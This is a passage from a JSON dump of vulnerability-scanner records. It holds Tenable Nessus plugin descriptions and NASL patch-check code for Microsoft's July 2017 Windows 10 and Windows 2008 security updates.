An attacker\n could also embed an ActiveX control marked "safe\n for initialization" in an application or Microsoft\n Office document that hosts the related rendering engine.\n The attacker could also take advantage of compromised\n websites, and websites that accept or host user-provided\n content or advertisements. These websites could contain\n specially crafted content that could exploit the\n vulnerability. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8601)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console when it improperly\n parses XML input containing a reference to an external\n entity. An attacker who successfully exploited this\n vulnerability could read arbitrary files via an XML\n external entity (XXE) declaration. (CVE-2017-8557)", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-11-03T00:00:00", "title": "KB4025338: Windows 10 July 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8599", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8607", "CVE-2017-8601", "CVE-2017-8565", "CVE-2017-8605", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8585", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8609", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8595", "CVE-2017-8611", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "modified": "2017-11-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUL_4025338.NASL", "href": "https://www.tenable.com/plugins/nessus/104383", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The 
descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104383);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-0170\",\n \"CVE-2017-8463\",\n \"CVE-2017-8467\",\n \"CVE-2017-8486\",\n \"CVE-2017-8495\",\n \"CVE-2017-8556\",\n \"CVE-2017-8557\",\n \"CVE-2017-8561\",\n \"CVE-2017-8562\",\n \"CVE-2017-8563\",\n \"CVE-2017-8564\",\n \"CVE-2017-8565\",\n \"CVE-2017-8573\",\n \"CVE-2017-8577\",\n \"CVE-2017-8578\",\n \"CVE-2017-8580\",\n \"CVE-2017-8581\",\n \"CVE-2017-8582\",\n \"CVE-2017-8585\",\n \"CVE-2017-8587\",\n \"CVE-2017-8588\",\n \"CVE-2017-8589\",\n \"CVE-2017-8590\",\n \"CVE-2017-8592\",\n \"CVE-2017-8595\",\n \"CVE-2017-8599\",\n \"CVE-2017-8601\",\n \"CVE-2017-8602\",\n \"CVE-2017-8605\",\n \"CVE-2017-8606\",\n \"CVE-2017-8607\",\n \"CVE-2017-8608\",\n \"CVE-2017-8609\",\n \"CVE-2017-8611\",\n \"CVE-2017-8618\",\n \"CVE-2017-8619\"\n );\n script_bugtraq_id(\n 99387,\n 99388,\n 99389,\n 99390,\n 99391,\n 99392,\n 99393,\n 99394,\n 99396,\n 99397,\n 99398,\n 99399,\n 99400,\n 99402,\n 99403,\n 99408,\n 99409,\n 99410,\n 99412,\n 99413,\n 99414,\n 99416,\n 99418,\n 99419,\n 99420,\n 99421,\n 99423,\n 99424,\n 99425,\n 99426,\n 99427,\n 99428,\n 99429,\n 99431,\n 99432,\n 99439\n );\n script_xref(name:\"MSKB\", value:\"4025338\");\n script_xref(name:\"MSFT\", value:\"MS17-4025338\");\n\n script_name(english:\"KB4025338: Windows 10 July 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4025338.\nIt is, therefore, affected by 
multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-8589)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine, when rendered in Internet\n Explorer, handles objects in memory. In a web-based\n attack scenario, an attacker could host a specially\n crafted website that is designed to exploit this\n vulnerability through Internet Explorer and then\n convince a user to view the website. An attacker could\n also embed an ActiveX control marked "safe for\n initialization in an application or Microsoft\n Office document that hosts the Internet Explorer\n rendering engine. The attacker could also take advantage\n of compromised websites and websites that accept or host\n user-provided content or advertisements. These websites\n could contain specially crafted content that could\n exploit this vulnerability. An attacker who successfully\n exploited this vulnerability could gain the same user\n rights as the current user. (CVE-2017-8618)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8467, CVE-2017-8556,\n CVE-2017-8573, CVE-2017-8577, CVE-2017-8578,\n CVE-2017-8580)\n\n - A Denial Of Service vulnerability exists when Windows\n Explorer attempts to open a non-existent file. An\n attacker who successfully exploited this vulnerability\n could cause a denial of service. 
A attacker could\n exploit this vulnerability by hosting a specially\n crafted web site and convince a user to browse to the\n page, containing the reference to the non-existing file,\n and cause the victim's system to stop responding. An\n attacker could not force a user to view the attacker-\n controlled content. Instead, an attacker would have to\n convince a user to take action. For example, an attacker\n could trick a user into clicking a link that takes the\n user to the attacker's site The update addresses the\n vulnerability by correcting how Windows Explorer handles\n open attempts for non-existent files. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in the way\n JavaScript engines render when handling objects in\n memory in Microsoft browsers. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2017-8606, CVE-2017-8607,\n CVE-2017-8608)\n\n - A security feature bypass vulnerability exists in\n Microsoft Windows when Kerberos fails to prevent\n tampering with the SNAME field during ticket exchange.\n An attacker who successfully exploited this\n vulnerability could use it to bypass Extended Protection\n for Authentication. (CVE-2017-8495)\n\n - A remote code execution vulnerability exists in the way\n that the Scripting Engine renders when handling objects\n in memory in Microsoft browsers. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. 
(CVE-2017-8609)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2017-8561)\n\n - A remote code execution vulnerability exists in\n PowerShell when PSObject wraps a CIM Instance. An\n attacker who successfully exploited this vulnerability\n could execute malicious code on a vulnerable system. In\n an attack scenario, an attacker could execute malicious\n code in a PowerShell remote session. The update\n addresses the vulnerability by correcting how PowerShell\n deserializes user supplied scripts. (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8562)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows when Win32k fails to properly handle\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8486)\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console when it improperly\n parses XML input containing a reference to an external\n entity. An attacker who successfully exploited this\n vulnerability could read arbitrary files via an XML\n external entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. 
An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8595, CVE-2017-8605,\n CVE-2017-8619)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. (CVE-2017-8590)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8564)\n\n - A security feature bypass vulnerability exists when\n Microsoft Browsers improperly handle redirect requests.\n This vulnerability allows Microsoft Browsers to bypass\n CORS redirect restrictions and to follow redirect\n requests that should otherwise be ignored. An attacker\n who successfully exploited this vulnerability could\n force the browser to send data that would otherwise be\n restricted to a destination web site of their choice.\n (CVE-2017-8592)\n\n - An Information Disclosure vulnerability exists when the\n HTTP.sys server application component improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the HTTP.sys server application\n system. A remote unauthenticated attacker could exploit\n this vulnerability by issuing a request to the HTTP.sys\n server application. The update addresses the\n vulnerability by correcting how the HTTP.sys server\n application handles objects in memory. 
(CVE-2017-8582)\n\n - A spoofing vulnerability exists when an affected\n Microsoft browser does not properly parse HTTP content.\n An attacker who successfully exploited this\n vulnerability could trick a user by redirecting the user\n to a specially crafted website. The specially crafted\n website could either spoof content or serve as a pivot\n to chain an attack with other vulnerabilities in web\n services. (CVE-2017-8602)\n\n - A denial of service vulnerability exists when Microsoft\n Common Object Runtime Library improperly handles web\n requests. An attacker who successfully exploited this\n vulnerability could cause a denial of service against a\n .NET web application. A remote unauthenticated attacker\n could exploit this vulnerability by issuing specially\n crafted requests to the .NET application. The update\n addresses the vulnerability by correcting how the .NET\n web application handles web requests. (CVE-2017-8585)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context.\n (CVE-2017-8581)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when a man-in-the-middle attacker is\n able to successfully forward an authentication request\n to a Windows LDAP server, such as a system running\n Active Directory Domain Services (AD DS) or Active\n Directory Lightweight Directory Services (AD LDS), which\n has been configured to require signing or sealing on\n incoming connections. The update addresses this\n vulnerability by incorporating support for Extended\n Protection for Authentication security feature, which\n allows the LDAP server to detect and block such\n forwarded authentication requests once enabled.\n (CVE-2017-8563)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. 
An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2017-8611)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge fails to correctly apply Same Origin\n Policy for HTML elements present in other browser\n windows. An attacker could use this vulnerability to\n trick a user into loading a page with malicious content.\n (CVE-2017-8599)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft WordPad parses specially crafted files.\n Exploitation of this vulnerability requires that a user\n open a specially crafted file with an affected version\n of Microsoft WordPad. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists when\n Windows Explorer improperly handles executable files and\n shares during rename operations. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in the context of another user. Users not\n running as administrators would be less affected.\n (CVE-2017-8463)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. In a web-based attack scenario, an attacker could\n host a specially crafted website that is designed to\n exploit the vulnerability through Microsoft browsers and\n then convince a user to view the website. 
An attacker\n could also embed an ActiveX control marked "safe\n for initialization" in an application or Microsoft\n Office document that hosts the related rendering engine.\n The attacker could also take advantage of compromised\n websites, and websites that accept or host user-provided\n content or advertisements. These websites could contain\n specially crafted content that could exploit the\n vulnerability. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8601)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console when it improperly\n parses XML input containing a reference to an external\n entity. An attacker who successfully exploited this\n vulnerability could read arbitrary files via an XML\n external entity (XXE) declaration. (CVE-2017-8557)\");\n # https://support.microsoft.com/en-us/help/4025338/windows-10-update-kb4025338\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?aa6f9fa1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4025338.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-07\";\nkbs = make_list('4025338');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\nos_name = get_kb_item_or_exit(\"SMB/ProductName\");\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif(\"LTSB\" >!< os_name) audit(AUDIT_OS_NOT, \"Windows 10 version 1507 LTSB\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"07_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4025338])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:44:08", "description": "The remote Windows host is missing multiple security updates. 
It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Microsoft Graphics component due to improper\n handling of objects in memory. A local attacker can\n exploit these, via a specially crafted application, to\n run arbitrary code in kernel mode. (CVE-2017-8467,\n CVE-2017-8556, CVE-2017-8573, CVE-2017-8577,\n CVE-2017-8578, CVE-2017-8580)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. 
An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. 
An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - A remote code execution vulnerability exists in the way \n JavaScript engines render when handling objects in memory \n in Microsoft browsers. The vulnerability could corrupt memory \n in such a way that an attacker could execute arbitrary code \n in the context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user rights as \n the current user. 
(CVE-2017-8606, CVE-2017-8607, CVE-2017-8608,\n CVE-2017-8618)", "edition": 31, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-11T00:00:00", "title": "Windows 2008 July 2017 Multiple Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8607", "CVE-2017-8565", "CVE-2017-8467", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUL_WIN2008.NASL", "href": "https://www.tenable.com/plugins/nessus/101374", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101374);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/04/10 16:10:18\");\n\n script_cve_id(\n \"CVE-2017-0170\",\n \"CVE-2017-8463\",\n \"CVE-2017-8467\",\n \"CVE-2017-8486\",\n \"CVE-2017-8495\",\n \"CVE-2017-8556\",\n \"CVE-2017-8557\",\n \"CVE-2017-8563\",\n \"CVE-2017-8564\",\n \"CVE-2017-8565\",\n \"CVE-2017-8573\",\n \"CVE-2017-8577\",\n \"CVE-2017-8578\",\n \"CVE-2017-8580\",\n \"CVE-2017-8581\",\n \"CVE-2017-8582\",\n \"CVE-2017-8587\",\n \"CVE-2017-8588\",\n \"CVE-2017-8589\",\n \"CVE-2017-8590\",\n \"CVE-2017-8592\",\n \"CVE-2017-8606\",\n \"CVE-2017-8607\",\n \"CVE-2017-8608\",\n \"CVE-2017-8618\"\n );\n script_bugtraq_id(\n 99387,\n 99389,\n 99394,\n 99396,\n 99398,\n 99400,\n 99402,\n 99409,\n 99413,\n 99414,\n 99416,\n 99419,\n 99421,\n 99423,\n 99424,\n 99425,\n 99427,\n 99428,\n 99429,\n 99431,\n 99439\n );\n script_xref(name:\"MSKB\", value:\"4022746\");\n script_xref(name:\"MSFT\", value:\"MS17-4022746\");\n script_xref(name:\"MSKB\", value:\"4022748\");\n script_xref(name:\"MSFT\", value:\"MS17-4022748\");\n script_xref(name:\"MSKB\", value:\"4022914\");\n script_xref(name:\"MSFT\", value:\"MS17-4022914\");\n script_xref(name:\"MSKB\", value:\"4025240\");\n script_xref(name:\"MSFT\", value:\"MS17-4025240\");\n script_xref(name:\"MSKB\", value:\"4025252\");\n script_xref(name:\"MSFT\", value:\"MS17-4025252\");\n script_xref(name:\"MSKB\", value:\"4025397\");\n script_xref(name:\"MSFT\", value:\"MS17-4025397\");\n script_xref(name:\"MSKB\", value:\"4025398\");\n script_xref(name:\"MSFT\", value:\"MS17-4025398\");\n script_xref(name:\"MSKB\", value:\"4025409\");\n script_xref(name:\"MSFT\", value:\"MS17-4025409\");\n script_xref(name:\"MSKB\", value:\"4025497\");\n script_xref(name:\"MSFT\", value:\"MS17-4025497\");\n script_xref(name:\"MSKB\", value:\"4025674\");\n script_xref(name:\"MSFT\", 
value:\"MS17-4025674\");\n script_xref(name:\"MSKB\", value:\"4025872\");\n script_xref(name:\"MSFT\", value:\"MS17-4025872\");\n script_xref(name:\"MSKB\", value:\"4025877\");\n script_xref(name:\"MSFT\", value:\"MS17-4025877\");\n script_xref(name:\"MSKB\", value:\"4026059\");\n script_xref(name:\"MSFT\", value:\"MS17-4026059\");\n script_xref(name:\"MSKB\", value:\"4026061\");\n script_xref(name:\"MSFT\", value:\"MS17-4026061\");\n script_xref(name:\"MSKB\", value:\"4032955\");\n script_xref(name:\"MSFT\", value:\"MS17-4032955\");\n\n script_name(english:\"Windows 2008 July 2017 Multiple Security Updates\");\n script_summary(english:\"Checks the existence of Windows Server 2008 July 2017 Patches.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing multiple security updates. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Microsoft Graphics component due to improper\n handling of objects in memory. 
A local attacker can\n exploit these, via a specially crafted application, to\n run arbitrary code in kernel mode. (CVE-2017-8467,\n CVE-2017-8556, CVE-2017-8573, CVE-2017-8577,\n CVE-2017-8578, CVE-2017-8580)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. 
An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. 
(CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - A remote code execution vulnerability exists in the way \n JavaScript engines render when handling objects in memory \n in Microsoft browsers. The vulnerability could corrupt memory \n in such a way that an attacker could execute arbitrary code \n in the context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user rights as \n the current user. (CVE-2017-8606, CVE-2017-8607, CVE-2017-8608,\n CVE-2017-8618)\");\n # https://support.microsoft.com/en-us/help/4022746/security-update-for-kerberos-sname-security-feature-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?87cdb7f6\");\n # https://support.microsoft.com/en-us/help/4022748/windows-kernel-information-disclosure-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e0e35b15\");\n # https://support.microsoft.com/en-us/help/4022914/windows-kernel-information-disclosure-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1336095c\");\n # https://support.microsoft.com/en-us/help/4025240/microsoft-browser-security-feature-bypass-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9d0d50a8\");\n # https://support.microsoft.com/en-ca/help/4025252/cumulative-security-update-for-internet-explorer-july-11-2017\n 
